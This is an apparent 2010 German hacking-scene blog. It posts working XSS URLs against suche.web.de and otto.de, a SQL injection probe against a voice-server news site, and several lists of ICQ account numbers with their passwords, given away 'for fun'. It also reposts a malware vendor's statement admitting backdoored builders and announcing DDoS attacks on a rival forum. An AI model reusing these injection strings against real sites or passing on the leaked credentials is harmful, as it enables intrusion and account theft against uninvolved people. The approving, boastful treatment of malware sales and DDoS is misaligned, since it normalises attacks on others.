[XSS] suche.web.de

24. April 2010 Dexx 2 Kommentare

hier ne xss von suche.web.de

http://suche.web.de/search/web/?mc=suche%40web%40eingabefeldoben.suche%40web&allparams=&smode=&su=%22%3Cscript%3Ealert%28%22Dexx+was+here+%3B%29%22%29%3C%2Fscript%3E&search=Suche&webRb=

KategorienVulnerable Sites Tags:

[XSS] Otto.de

15. April 2010 Dexx 2 Kommentare

Hier aus Zufall gerade auf Otto.de entdeckt ;) .

http://www.otto.de/is-bin/INTERSHOP.enfinity/WFS/Otto-OttoDe-Site/de_DE/-/EUR/OV_ViewFHSearch-Search?commit=true&fh_search_initial=%3Cscript%3Ealert1337%3Cscript%3E&ls=0&commit=true&fh_search=%3Cscript%3Ealert1337%3Cscript%3E&&fh_search_requested=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&sterm=%22%3Cscript%3Ealert%28%22Dexx%20was%20here%20;%29%22%29%3C%2Fscript%3E&stype=N

KategorienVulnerable Sites Tags:

5x 7er ICQ UIN’s

4. April 2010 Dexx 5 Kommentare

Hier sind 5, 7er ICQ UIN’s have fun, viel glück ;)

4337293;VBeyDoaX
4342977;NjwWrC5p
4354592;eKPoVwqT
4361127;UACzaW3x
4368309;wZ434ka7

KategorienStuff Tags:

Statement von Scenetools.net

27. März 2010 Dexx 5 Kommentare

Soeben auf der Scenetools.net seite vorgefunden, was ich euch nicht vorenthalten möchte, wem ihr glauben schenken wollt, ist eure sache, ich enthalte mich da vollkommen.

Scenetools.net schließt die Pforten und SceneCoderz.cc ist seit gestern unter vollem DDos von Hannez, ließt selbst.

Hey Kinder!

Das hier ist jetzt das letzte Mal, dass ihr was von Scenetools hören werdet.
Viele von euch werden jetzt voller Freude “Ja endlich sind diese Ripper weg” schreien.
Doch lasse mir das Recht nicht nehmen alles klarzustellen.
Jeder der Interesse hat zu erfahren was bei Scenetools WIRKLICH los war sollte das hier auf jeden Fall GANZ lesen.

Alles begann als ihr dem Gelaber von klein k!LLu, dass der Bot ein reiner Copy Paste vom Stasi ist, Glauben geschenkt habt.
Er hat die tollsten “Beweise” gepostet, Dateien verglichen und angebliche EOF Daten gepostet die nie existiert haben.
Hättet ihr euch selber die Mühe gemacht die Dateien zu analysieren wär euch aufgefallen, dass sein Gespräch der reinste Schwachsinn ist/war.
Es waren nie EOF Daten an dem Server vom Bot angehangen.
(Ein kleiner Einschub für die “Pros” unter euch. Wie ihr vielleicht wisst wurden alle Server nach dem sie erstellt wurden mit einem Obfuscator geschützt.
Jeder der ein bisschen Ahnung hat weiß, dass sämtliche EOF Daten beim Obfuscieren gelöscht werden.
Und es macht wenig Sinn EOF Daten aus Spass an eine obfuscierte Datei zu hängen. Weiter gehts…)
Ich habe lediglich das Panel von Stasi übernommen und gemoddet, da es mir gut gefallen hat und ich nicht wirklich gut in PHP bin.
Nicht anders als erwartet verbreiteten sich bei den ganzen primitiven Individuen die in der “Scene” dahervegetieren diese Gerüchte
innerhalb weniger Stunden ohne jegliche Prüfung auf deren Wahrheitswert.
Statements meiner Seite wurden natürlich als lächerlich dargestellt.
Von Heute auf Morgen war das so angepriesene Scenetools Projekt von allen gehasst.
Damit gab ich mich zufrieden und lies die Leute reden!
Dem nicht genug hatte ein Heihachi Supporter (ethan) den Bot bei mir gekauft.
Damals war ich gut mit chipy/Jacqueline/ScenenBewacher befreundet!
Er wusste dass es Probleme mit Heihachi gab und hat mir Hosting angeboten.
Wegen den ganzen “Gerüchten” über ihn habe ich dieses Angebot abgelehnt.
Eines Abends schrieb er mich an um mich vor dem Supporter zu warnen.
ethan hatte mehrmals mit mir über das Copy Paste Gerücht gesprochen, hat jedoch am Ende anscheinend k!LLus Lügen abgekauft
und bei chipy groß getönt, dass er mich von Heihachi kicken wird und meine IP-Logs der Polizei gibt.
Es kann mir niemand erzählen, dass jemand von euch in diesem Moment anders reagiert hätte als ich.
Ich hab mich natürlich sofort ins ServerPanel gemacht und alles gelöscht was von Scenetools vorhanden war.
Leider habe ich in diesem Moment nicht so weit gedacht und mir ein Backup erstellt.
Mir ging nur durch den Kopf meinen Arsch zu retten, weil ich mich für solche Idioten wie euch bestimmt nicht busten lasse!
Noch während des Löschvorgangs ging mein Server auf unerklärliche Weise offline.
Bis heute streitet Heihachi ab, dass ethan bei Ihnen arbeitet noch, dass Sie etwas mit den “Downtimes” meines Server zu tun hatten.
chipy war jedoch bei ethan per Teamviewer auf dem Computer gewesen und hat ihm gezeigt, dass er wirklich Heihachi Supporter ist.
Um Heihachi die Hölle heiß zu machen fragte ich chipy nach ICQ-Logs.
Darauf bekam ich die Antwort: “Ich sagte dir. Lass mich aus dem Spiel. Du bekommst nichts von mir”.
Erst warnt er mich vor Heihachi worauf ich alles von Scenetools im Schnelldurchgang gelöscht habe und dann lässt er mich auf offenem Flur stehen ohne den kleinsten festen Beweis.
Jetzt stand ich einem Haufen von Leuten gegenüber, die mich als Oberripper #1 feierten.
Auch wenn ich Malware Coder bin habe ich ein paar ethische Grundsätze und einer davon ist, dass wenn mir jemand Geld gibt er auch etwas dafür erhält.
Jeder von euch hatte seine Tools erhalten und war mehr oder weniger zufrieden damit!
Natürlich war es “dumm” von mir den Authentication-Server auf die Scenetools Domain zu setzen, wodurch die Tools während den Downtimes nicht nutzbar waren.
Ich hatte anfangs nicht gedacht, dass es so viele DDos-Kids gibt und schon 10mal nicht, dass Scenetools je so erfolgreich sein wird.
Für mich gab es zu dem Zeitpunkt zwei Alternativen:
- Scenetools aufgeben und die “Scene” verlassen
- Scenetools wieder aufbauen und irgendwie einen Neuanfang schaffen
Nach vielen Gesprächen mit Leuten aus der Scene die wussten was passiert war entschied ich mich Scenetools mit einem alten Backup (dem Neusten was ich hatte) wieder online zu nehmen.
Natürlich taten mir die 30 Leute die ihre gekauften Tools verloren hatten leid.
Nur nachdem ich die ganzen Threads in den Foren verfolgt hatte, war ich total demotiviert diesen Personen auf irgendeine Weise entgegenzukommen.
Die Frage warum ich eine “neue Identität” angenommen habe beantworte ich mit einer Gegenfrage.
Wer von euch hätte denn bitte noch was von Hannez dem “Oberripper #1″ gekauft???
Kaum war Scenetools wieder online gingen die Rippergespräche weiter obwohl “jemand” 90% der Kunden gerettet hatte.
Da wurde ich mir erst richtig bewusst was für ein undankbares Volk die heutige “Scene” ist.
Wie in der Vergangenheit wurde Scenetools von unzähligen Kiddy-DDos-Attacken heimgesucht, die ich mit einem neuen VPS unter Kontrolle bekam.
Es lief sehr lange wieder gut, bis vor 5 Tagen.
Auf einmal schrieb mich ein Typ namens x3n an und meinte, dass er meinen Crypter gecrackt hat.
Ich war überrascht, da ich mein Sicherheitssystem für sehr sicher gehalten habe.
Noch mehr war ich überrascht als er mir die “gecrackten” Dateien zukommen lies.
Er hatte den AuthServer mit den nötigen Daten emuliert und konnte damit den Crypter starten.
Eine sehr schlaue Idee muss ich sagen wofür ich ihn auch sehr respektier!
Auf seine Worte, dass er das Programm nicht leaken wird konnte ich mich jedoch nicht verlassen.
Heute Morgen schrieb mich ein Kunde an und fragte “Was der Scheiss soll” und gab mir einen Link zu Scenecoderz.
Dort wurde der “gecrackte” Crypter von Paranoid geleakt.
Ich habe mir einen Punkt gesetzt an dem ich mit Scenetools aufhören werde und das ist der Fall sobald die Tools gecrackt und geleakt werden.
Warum werdet ihr euch jetzt fragen? Macht euch selber Gedanken drüber! Die Frage sollte sich jeder normal denkende Mensch selber beantworten können.
Jedenfalls habe ich Paranoid gesagt, dass er den Leak entfernen soll.
Natürlich hat er sich nur über mich und Scenetools lächerlich gemacht und das Tool auf mehreren Seiten verteilt.
Als “Rache” gibts jetzt DauerDDos von mir bis Scenecoderz zerstört ist! Ich werde euch den Spass verderben Jungs! Glaubts mir! ;-)
Scenetools ist jetzt tot und ich habe nichts mehr zu verlieren. Natürlich hagelt im Moment DDos von Scenecoderz bei Scenetools rein.
Deswegen und als Sicherheitsvorkehrung, dass nicht noch mehr Tools geleakt werden habe ich den AuthServer von Scenetools offline genommen. Für immer!
Nun zu den Backdoor Beschuldigungen.
Ich gebe zu, dass es eine Backdoor in jedem Builder gab die jedoch nie genutzt wurde.
Warum solltet ihr mir das glauben? Ganz einfach. Wie ihr sehen könnt ist die Backdoor in dem Leak auch nicht entfernt.
Öffnet einfach mal die security.php und schaut euch das Ende an.
Da gibts eine Zeile in der steht: < span id="backdoored" > < / span >
Wenn x3n Lust hätte, könnte er die Backdoor in seinem “gecrackten” Builder aktivieren.
Solang diese Zeile leer ist, ist die Backdoor deaktiviert. Das war immer der Fall.
Und eine kleine Frage zum Gedanken anregen…
Was bringen mir 100 infizierte Kunden? Die Hand voll Bots bekomme ich auf andere Art und Weise viel schneller und einfacher!
Also lasst das doofe “Scenetools hat seine Kunden infiziert” Gespräch.
Wenn ihr zu doof seit um euch selber clean zu halten seit ihr es selber schuld.
Jetzt könnt ihr mich gut und gerne als Oberripper #1 feiern, denn dieses Mal wird keine Person kommen und Scenetools wieder online setzen.
Auf gut Deutsch: Eure Tools sind jetzt einen Dreck wert, weil sie nicht mehr funktionieren.
Aber das juckt euch doch eh nicht, da 95% von euch der Meinung sind, dass Scenetools nur Schrott verkauft hat.
Erst Scenetools feiern und dann wenn es kleine Probleme gibt mit der Masse Scenetools niedermachen.
Etwas wie eine eigene Meinung habt ihr euch wohl noch nie gebildet oder?
x3n hat ja groß angekündigt dass er heute noch die anderen Tools und Sources von mir leaken wird.
Bin sehr gespannt ob er dieses leere Versprechen wirklich einhalten wird. Ich wette 500 PSC dagegen!
Ich wünsche euch viel Spass mit den gecrackten Tools und hoffe ihr seit glücklich damit wie es geendet ist.
Überlegt euch einfach das nächste Mal was ihr mit solch einem Verhalten bewirken könnt.

Asche zu Asche, Staub zu Staub und Schrott zu Schrott!
Good bye Jungs und Mädels

Euer Oberripper #1 Hannez

KategorienSzene News Tags:

5x 7er ICQ UIN’s

20. März 2010 Dexx Keine Kommentare

Hier sind 5, 7er ICQ UIN’s have fun, viel glück ;)

3662199;QM0qxx02
3679635;CCr8K6C5
3683147;oUF6gdR0
3684072;3Xfq44JU
3685061;MIsSkRB2

KategorienStuff Tags:

[SQLi] Voiceserver.de

20. März 2010 Dexx Keine Kommentare

http://www.nsec.de/vsde/main.php?show=news&id=572+and+1=0

KategorienVulnerable Sites Tags:

5x 7er ICQ UIN’s

19. März 2010 Dexx Keine Kommentare

Hier sind 5, 7er ICQ UIN’s have fun, viel glück ;)

3655423;Xwwz10vV
3655459;ne6QzcOW
3655471;ZyBoUMhz
3655483;Jdbabbgd
3655498;AdZ1c4OY

KategorienStuff Tags:

Swissfaking wieder weg

17. März 2010 Dexx 1 Kommentar

Wenn man swissfaking.6x.to besucht, sieht man:

We closed this subdomain because the owner tried to promote it with SPAM!

Das liegt daran, dass swissfaking gekickt wurde von 2×4.ru

Sie sind immoment auf:

http://swissfaking.u2m.ru/board/

zu erreichen

Es ist mittlerweile nichts neues das Swissfaking mal auftaucht und wieder verschwindet, so oft wie Sie schon leiden mussten, bald stirbt die Szene aus. ( Nicht das es mir gefällt, ist eine reine feststellung )

KategorienSzene News Tags:

5x 7er ICQ UIN’s

17. März 2010 Dexx 1 Kommentar

Hier sind 5, 7er ICQ UIN’s have fun, viel glück ;)

3655047;0G2xDtRo
3655072;aJBZvXJy
3655174;9925hiba
3655312;j47sHR5M
3655401;EuQDrf2X

KategorienStuff Tags:

5x 7er ICQ UIN’s

16. März 2010 Dexx Keine Kommentare

Hier sind 5, 7er ICQ UIN’s have fun, viel glück ;)

3460942:QYtzU4NU
3464072:Yn40LRsl
3472636:Rhb02Ij2
3486281:0UIdlR4Y
3505692:uCUCuE6A

KategorienStuff Tags: